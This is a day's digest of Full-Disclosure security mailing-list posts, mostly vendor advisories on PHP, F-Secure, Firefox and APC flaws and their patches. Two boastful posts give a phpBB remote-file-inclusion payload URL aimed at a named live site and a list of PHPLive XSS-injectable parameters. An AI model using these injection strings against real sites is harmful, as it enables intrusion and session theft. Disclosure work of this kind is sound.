From codeshepherd at gmail.com Fri Jun 1 09:26:28 2007 From: codeshepherd at gmail.com (=?ISO-8859-1?Q?D=EB=EA=FE=E0=F1_=C7h=E4kr=E3v=E2rth=FF?=) Date: Fri, 01 Jun 2007 16:26:28 +0800 Subject: [Full-disclosure] Palimm Palimmm In-Reply-To: <686adc11.290a7144.465efce4.b4ec1@o2.pl> References: <173552787.20070531180730@Zoller.lu> <686adc11.290a7144.465efce4.b4ec1@o2.pl> Message-ID: <465FD834.1050506@gmail.com> mailing-lists wrote: > I think I read this before... :) > > RMS > > How do I read this message ? >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> 5DFFC7C3DCFBCED5CEDD48F216936CF9 >> 9B704583D6E5056E67C959B5CCEE2F548D3C70F3 >> >> 3ABC8C9964BDBB6E8521E58C641B4812 >> AD1C3B3CC1E821CA8D91E7A01ADC0C96B7854235 >> >> 9D74F62FBD9A44311D42BF0C5B051A9C >> 0DBB6B045ED8F83C34E08832E57DB143B5ECB82C >> >> 632D332771B1314604762E855B58987C >> 349E7A0AEC82090A7206F603A5EB474E9762611C >> >> 5D717685786D54BBFC9E1200BEEA3C2E >> 9BC107502C21AF59903AC9FE388E8C98907F466F >> >> A2761D0E2AF8DFA6F6BE26A48565B863 >> 4E5C27420A66418CA7F9EB0635436A5B5B5BE2D8 >> >> F866801EF3BE6D6749B745176363C58B >> 5804EB264F318ED1ADBC8195A84527D8CDF72AA9 >> >> F095752B5CB8C7FD52B52A13987143D9 >> 6C81F23E6AF0375020E4B5AC644F0CADA67F2A77 >> >> 64D950594527059E23836858806D177E >> 3A5DEF28C4624C2A29A0188959F65693598B7C93 >> >> B4F093AEBA68D786B646E27B392C55FC >> 5820788972BF117B796391C8F6B0D46DD4B0A00C >> >> B9BED56CC3CF2A5F2D8C9E83DDAE172F >> E22C25C6E10493BA7AA1DAAFA88125F11BA6501B >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1.4.5 (MingW32) >> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org >> >> iD8DBQFGXvKysUkP5Dr8mwkRAt11AJ9+LGB7nFHDpTzy7PORTcxnRgBlAwCePzIc >> gZxohWL4ZNDYN8O7WZKlAs8= >> =sdno >> -----END PGP SIGNATURE----- >> >> -- >> http://secdev.zoller.lu >> Thierry Zoller >> From research at sec-consult.com Fri Jun 1 15:19:15 2007 From: research at sec-consult.com (Gerhard Wagner) Date: Fri, 1 Jun 2007 16:19:15 +0200 Subject: [Full-disclosure] SEC Consult SA-20070601-0 :: PHP chunk_split() integer overflow Message-ID: <46602AE3.4010303@sec-consult.com> SEC Consult Security Advisory < 20070601-0 > =========================================================================== title: PHP chunk_split() integer overflow program: PHP vulnerable version: < 5.2.3 impact: moderate homepage: http://www.php.net found: 2007-05-25 by: Gerhard Wagner / SEC Consult / www.sec-consult.com permanent link: http://www.sec-consult.com/291.html =========================================================================== Vendor description: --------------- PHP is a widely-used general-purpose scripting language that is especially suited for Web development ... Vulnerability overview: --------------- The parameters chunks, srclen and chunklen are used without any check in a memory allocation statement. Due to a possible integer overflow this can result in the allocation of a too small buffer which leads to a heap overflow. This crashes the php process and may allow execution of arbitrary code. Vulnerability details: --------------- In line 1963 the chunk_split function tries to allocate the adequate size of memory for the result of the function. In case the values chunks and endlen are bigger than 65534 an integer overflow is triggered and the wrong size of memory is allocated, which results in a heap overflow. ext/standard/string.c: 1953 static char *php_chunk_split(char *src, int srclen, char *end, int endlen, int chunklen, int *destlen) 1954 { 1955 char *dest; 1956 char *p, *q; 1957 int chunks; /* complete chunks! */ 1958 int restlen; 1959 1960 chunks = srclen / chunklen; 1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */ 1962 1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1), sizeof(char), 0); 1964 1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) { 1966 memcpy(q, p, chunklen); 1967 q += chunklen; 1968 memcpy(q, end, endlen); 1969 q += endlen; 1970 p += chunklen; 1971 } proof of concept: --------------- vulnerable versions: --------------- The version 5.2.3 fixes this security issue. All earlier releases should be prone to the demonstrated vulnerability. vendor status: --------------- vendor notified: 2007-05-29 vendor response: 2007-05-29 patch available: 2007-06-01 coordinated disclosure: 2007-06-01 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Wien Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 15 Mail: research at sec-consult dot com www.sec-consult.com EOF Gerhard Wagner / @2007 From security at nruns.com Fri Jun 1 17:37:10 2007 From: security at nruns.com (security at nruns.com) Date: Fri, 1 Jun 2007 18:37:10 +0200 Subject: [Full-disclosure] n.runs-SA-2007.013 - F-Secure Antivirus LZH parsing BufferOverflow Advisory Message-ID: n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.013 01-Jun-2007 ________________________________________________________________________ Vendor: F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 5.44 and earlier F-Secure Anti-Virus for Windows Servers version 5.52 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 6.03 and earlier F-Secure Anti-Virus for MS Exchange version 6.40 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 6.40 and earlier F-Secure Anti-Virus for Linux Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.30 and earlier F-Secure Anti-Virus Linux Server Security 5.30 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Buffer Overflow (remote) Risk: CRITICAL ________________________________________________________________________ Vendor communication: 2007/05/07 initial notification to F-Secure Corporation 2007/05/08 F-Secure Corporation Response 2007/05/08 PGP public keys exchange 2007/05/08 PoC files sent to F-Secure Corporation 2007/05/14 F-Secure Corporation acknowledged the PoC files 2007/05/18 F-Secure Corporation validate the Vulnerability 2007/05/18 F-Secure Corporation notify update release date 2007/05/30 F-Secure Corporation released Update with fixes ________________________________________________________________________ Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. In detail, the following flaw was determined: - Buffer Overflow through Integer wrap around in .LZH files parsing Impact: This problem can lead to remote arbitrary code execution if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. ________________________________________________________________________ Credit: Bugs found by Sergio Alvarez of n.runs AG. ________________________________________________________________________ References: http://www.f-secure.com/security/fsc-2007-1.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php ________________________________________________________________________ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact security at nruns.com for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply. From mc.iglo at googlemail.com Fri Jun 1 12:45:32 2007 From: mc.iglo at googlemail.com (MC Iglo) Date: Fri, 1 Jun 2007 13:45:32 +0200 Subject: [Full-disclosure] static XSS / SQL-Injection in Omegasoft Insel Message-ID: <99e73caa0706010445q7d01e05bsbc1c58475ea88aa7@mail.gmail.com> Input passed to fields in OmegaMw7's tables isn't properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site and/or inject SQL-Commands This applies to many many standard fields in different tables e.g. F05003, F05005, F05015 and to all user-created text fields using the form creator (you cannot do it a different way) kind regards MC.Iglo From dr.rezen at gmail.com Fri Jun 1 18:05:01 2007 From: dr.rezen at gmail.com (dr.rezen at gmail.com) Date: Fri, 01 Jun 2007 13:05:01 -0400 Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT Message-ID: New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week: victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 For example: http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 Enjoy :) BUG BY REZEN! XORCREW! H4X H4X! From dr.rezen at gmail.com Fri Jun 1 18:06:07 2007 From: dr.rezen at gmail.com (dr.rezen at gmail.com) Date: Fri, 01 Jun 2007 13:06:07 -0400 Subject: [Full-disclosure] PHPLive ALL VERSION: RFI + XSS Message-ID: There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others) /phplive/chat.php?sid= /phplive/help.php?LANG[DEFAULT_BRANDING]= /phplive/help.php?PHPLIVE_VERSION= /phplive/admin/header.php?admin[name]= /phplive/super/info.php?BASE_URL= And if serveradmin left default setup install files: /phplive/setup/footer.php?LANG[DEFAULT_BRANDING]= /phplive/setup/footer.php?PHPLIVE_VERSION= /phplive/setup/footer.php?nav_line= Bug found by ReZEN! XORCREW! H4X H4X! From openpkg-noreply at openpkg.com Fri Jun 1 13:11:30 2007 From: openpkg-noreply at openpkg.com (OpenPKG GmbH) Date: Fri, 1 Jun 2007 14:11:30 +0200 Subject: [Full-disclosure] [OpenPKG-SA-2007.020] OpenPKG Security Advisory (php) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ____________________________________________________________________________ Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public): OpenPKG-SA-2007.020 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.020 Advisory Published: 2007-06-01 14:10 UTC Issue Id (internal): OpenPKG-SI-20070601.01 Issue First Created: 2007-06-01 Issue Last Modified: 2007-06-01 Issue Revision: 02 ____________________________________________________________________________ Subject Name: php Security fixes Subject Summary: Security Fixes Subject Home: - Subject Versions: php5.* <= 5.2.3 Vulnerability Id: CVE-2007-2872, CVE-2007-2756 Vulnerability Scope: global (not OpenPKG specific) Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service, exposure of sensitive information, arbitrary code execution Description: According to a vendor release announcement [0] multiple security Enhancements and Fixes were fixed in version 5.2.3 of the programming language PHP [1]. Fixes that apply to the OpenPKG Enterprise 1 packages were extraced and backported. The readfile() funciton allows checking the existence of files anywhere in the filesystem. circumventing the open_basedir restriction. (http://bugs.php.net/bug.php?id=41492) Fixed possible infinite loop in imagecreatefrompng. (Xavier Roche) (CVE-2007-2756) Fixed an integer overflow inside chunk_split() (Gerhard Wagner) (CVE-2007-2872) References: [0] http://www.php.net/releases/5_2_3.php [1] http://www.php.net/ ____________________________________________________________________________ Primary Package Name: php Primary Package Home: http://openpkg.org/go/package/php Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLID apache-1.3.37-E1.0.6 OpenPKG Enterprise E1.0-SOLID php-5.1.6-E1.0.4 OpenPKG Community CURRENT apache-1.3.37-20070601 OpenPKG Community CURRENT apache2-php-5.2.3-20070601 OpenPKG Community CURRENT php-5.2.3-20070601 ____________________________________________________________________________ For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document. ____________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Comment: OpenPKG GmbH iD8DBQFGYAy3ZwQuyWG3rjQRAiYNAJ45r0YfBhnsIdTfGGKOwWT6XDi0/wCfUY+8 QnXdFKPBu0unwvT8LByR2eM= =4f0n -----END PGP SIGNATURE----- From skodliv at gmail.com Fri Jun 1 15:43:27 2007 From: skodliv at gmail.com (poo) Date: Fri, 1 Jun 2007 16:43:27 +0200 Subject: [Full-disclosure] Palimm Palimmm In-Reply-To: <465FD834.1050506@gmail.com> References: <173552787.20070531180730@Zoller.lu> <686adc11.290a7144.465efce4.b4ec1@o2.pl> <465FD834.1050506@gmail.com> Message-ID: knock your head into a wall 3 times and look in a mirror On 6/1/07, D????? ?h?kr?v?rth? wrote: > > mailing-lists wrote: > > I think I read this before... :) > > > > RMS > > > > > How do I read this message ? > >> -----BEGIN PGP SIGNED MESSAGE----- > >> Hash: SHA1 > >> > >> 5DFFC7C3DCFBCED5CEDD48F216936CF9 > >> 9B704583D6E5056E67C959B5CCEE2F548D3C70F3 > >> > >> 3ABC8C9964BDBB6E8521E58C641B4812 > >> AD1C3B3CC1E821CA8D91E7A01ADC0C96B7854235 > >> > >> 9D74F62FBD9A44311D42BF0C5B051A9C > >> 0DBB6B045ED8F83C34E08832E57DB143B5ECB82C > >> > >> 632D332771B1314604762E855B58987C > >> 349E7A0AEC82090A7206F603A5EB474E9762611C > >> > >> 5D717685786D54BBFC9E1200BEEA3C2E > >> 9BC107502C21AF59903AC9FE388E8C98907F466F > >> > >> A2761D0E2AF8DFA6F6BE26A48565B863 > >> 4E5C27420A66418CA7F9EB0635436A5B5B5BE2D8 > >> > >> F866801EF3BE6D6749B745176363C58B > >> 5804EB264F318ED1ADBC8195A84527D8CDF72AA9 > >> > >> F095752B5CB8C7FD52B52A13987143D9 > >> 6C81F23E6AF0375020E4B5AC644F0CADA67F2A77 > >> > >> 64D950594527059E23836858806D177E > >> 3A5DEF28C4624C2A29A0188959F65693598B7C93 > >> > >> B4F093AEBA68D786B646E27B392C55FC > >> 5820788972BF117B796391C8F6B0D46DD4B0A00C > >> > >> B9BED56CC3CF2A5F2D8C9E83DDAE172F > >> E22C25C6E10493BA7AA1DAAFA88125F11BA6501B > >> -----BEGIN PGP SIGNATURE----- > >> Version: GnuPG v1.4.5 (MingW32) > >> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > >> > >> iD8DBQFGXvKysUkP5Dr8mwkRAt11AJ9+LGB7nFHDpTzy7PORTcxnRgBlAwCePzIc > >> gZxohWL4ZNDYN8O7WZKlAs8= > >> =sdno > >> -----END PGP SIGNATURE----- > >> > >> -- > >> http://secdev.zoller.lu > >> Thierry Zoller > >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- smile tomorrow will be worse -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070601/a6c8a44d/attachment.html From guinness.stout at gmail.com Fri Jun 1 18:21:02 2007 From: guinness.stout at gmail.com (guiness.stout) Date: Fri, 1 Jun 2007 13:21:02 -0400 Subject: [Full-disclosure] APC PowerChute Network Shutdown 2.21 is vulnerable to directory transversal Message-ID: <7796947a0706011021s1f58dc5fjdfc9f35aa6d460ed@mail.gmail.com> Synopsis: APC PowerChute Network Shutdown 2.21 is vulnerable to directory transversal Background: APC PowerChute Network Shutdown is used to perform graceful shutdowns of network servers from one main server. Affected Versions: <= 2.21 build 116 Description: APC PowerChute Network Shutdown is vulnerable to a directory transversal by appending special characters such as %5c and %2e to the end of a URL. This is due to an existing vulnerability in Acme.Serve which is a Java HTTP server which PowerChute Network Shutdown is built on. Vendor Notified April 9th 2007 Vendor Response April 10th 2007 "A fix is being worked on for the next release." April 25th 2007 Spoke to vendor again, no ETA. May 3rd 2007 No ETA. June 1st 2007 No ETA. Reference: CVE-2001-0748 http://xforce.iss.net/xforce/xfdb/6634 http://www.securityfocus.com/bid/2809 http://www.apc.com/products/family/index.cfm?id=127 http://www.acme.com/java/software/Acme.Serve.Serve.html Chris Castaldo "An ounce of prevention is worth a pound of cure." -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070601/04b3b4bd/attachment.html From slythers at gmail.com Fri Jun 1 19:38:56 2007 From: slythers at gmail.com (Slythers Bro) Date: Fri, 1 Jun 2007 20:38:56 +0200 Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT In-Reply-To: References: Message-ID: <8f6a58a30706011138y44bdf2c9p7640f7f9db48a73d@mail.gmail.com> i saw that in functions_post.php : if (!defined ('IN_PHPBB ')) { die('Hacking attempt'); } so this RFI can't work -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070601/e2410b2a/attachment.html From kees at ubuntu.com Fri Jun 1 22:47:37 2007 From: kees at ubuntu.com (Kees Cook) Date: Fri, 1 Jun 2007 14:47:37 -0700 Subject: [Full-disclosure] [USN-468-1] Firefox vulnerabilities Message-ID: <20070601214737.GT14736@outflux.net> =========================================================== Ubuntu Security Notice USN-468-1 June 01, 2007 firefox vulnerabilities CVE-2007-1362, CVE-2007-2867, CVE-2007-2868, CVE-2007-2869, CVE-2007-2870, CVE-2007-2871 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox 1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1 Ubuntu 6.10: firefox 2.0.0.4+0dfsg-0ubuntu0.6.10 Ubuntu 7.04: firefox 2.0.0.4+1-0ubuntu1 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Various flaws were discovered in the layout and JavaScript engines. By tricking a user into opening a malicious web page, an attacker could execute arbitrary code with the user's privileges. (CVE-2007-2867, CVE-2007-2868) A flaw was discovered in the form autocomplete feature. By tricking a user into opening a malicious web page, an attacker could cause a persistent denial of service. (CVE-2007-2869) Nicolas Derouet discovered flaws in cookie handling. By tricking a user into opening a malicious web page, an attacker could force the browser to consume large quantities of disk or memory while processing long cookie paths. (CVE-2007-1362) A flaw was discovered in the same-origin policy handling of the addEventListener JavaScript method. A malicious web site could exploit this to modify the contents, or steal confidential data (such as passwords), of other web pages. (CVE-2007-2870) Chris Thomas discovered a flaw in XUL popups. A malicious web site could exploit this to spoof or obscure portions of the browser UI, such as the location bar. (CVE-2007-2871) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1.diff.gz Size/MD5: 177865 66cd69457a47dd365dcc471357eda3ca http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1.dsc Size/MD5: 1760 8ef755041bc77e27ea0a7e8659644462 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12.orig.tar.gz Size/MD5: 44750890 896c1ca3f27c09c6698a2074bbd5bd41 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_all.deb Size/MD5: 50668 8b8507aa080a14a56d5920318951b5ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_all.deb Size/MD5: 51554 69b38159095a014335251f54b590c2af amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 47467870 d350cb99c830f7664088949655088bff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 2806098 1071c56d689bf1557b21fde9d4245821 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 217610 eca00aa45b0a9c0e3f42a0c296c93bcd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 83978 56b65aafc0c8d999ea9391cb41937507 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 9443722 8c131ecc806c6558c1e65d3071dcbd4f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 220668 4f1ecfe4705df1c32ab525806a40c932 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 163734 d70d287eb51d24f3faa20ea89fa6077b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 245764 3b66eaf34da7ac7fba992600814e6ea4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_amd64.deb Size/MD5: 823402 a0c3a13065617636dfb55ad9707ce25d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 44032500 f7ed2076958f3368abed368b404b00ac http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 2806090 63905992293569aa8007858cf0eb392e http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 211016 938d59e4f9119076bc5a9c4f86dfc6d2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 76360 56cb5360d18836b7d26caefb0777d980 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 7951260 0ea991cac8bd862c8cc5e395ff0cd257 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 220666 babaa89307690d608e1e09401164ba8d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 148274 f721e39bf6fd17b9071132f7fd907eff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 245764 423da752a848362c0adb43a46f1dc4f0 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_i386.deb Size/MD5: 714984 a3ad4cbb948feb8112bc8b665240135a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 48863760 94582481df5050ea443086a83ca1edff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 2806042 97400d1422275d21049e976eaa1ca092 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 214470 33a9e8ff47f3f0625c25d33bbd32d508 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 79466 361068291d223debd83440da1bd91e2e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 9059024 db6c126df3c4e8d4bdee3948ed6c25db http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 220680 7a9b2f8b7eae232dd37c79f5604dfdfd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 160956 d21a09edc3e250109b1616e1503e5691 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 245768 719f5145d667f1b95491a650aa1bfa5b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_powerpc.deb Size/MD5: 814042 773d8eea707467fe2837b1a7b957bb1a sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 45428276 ed30861aa68e67c43aa82f21560a8476 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 2806192 ce47e4c12ab01f500d89a333e098fd71 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 211958 d5b2b493b36c86a9be0221e472f535df http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 77950 f2beb2f1c5be5eab81b34d6c9fbbafc1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 8448656 607dba9f2a034ef10ce21d210f16ec75 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 220668 c733d5841059eba97434ac2d9d14ae3b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 150860 52a94f74d10525c855e9a66f2759745f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 245762 51bb63256627cbc295215f5fa89c76f3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.12-0ubuntu0.6.06.1_sparc.deb Size/MD5: 725474 456ac9970549096ef3738f3f0f5fc900 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10.diff.gz Size/MD5: 320879 be400ccb6d77dc2ea59a56f94c3ce469 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg-0ubuntu0.6.10.dsc Size/MD5: 1856 4a48aaf8d25965c4ae6652be499b1fa3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.4+0dfsg.orig.tar.gz Size/MD5: 46775295 4c090f3d24222acf7201ca46819f0ad8 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.4+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 237232 60e594edd9a23161bc42a62ec67cf52b http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.4+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56054 16935d6a6041326587cd752def55664b http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.4+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56146 8a635c27c4efc4c31f86f1c0fc3012f9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.4+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56162 39871177288baaaeeb909fd78693b1d9 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.4+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56960 07a5f1e48bec6c45d491ef3194766ec7 amd64 architecture (Athlon64, Opteron, EM64T Xeon) 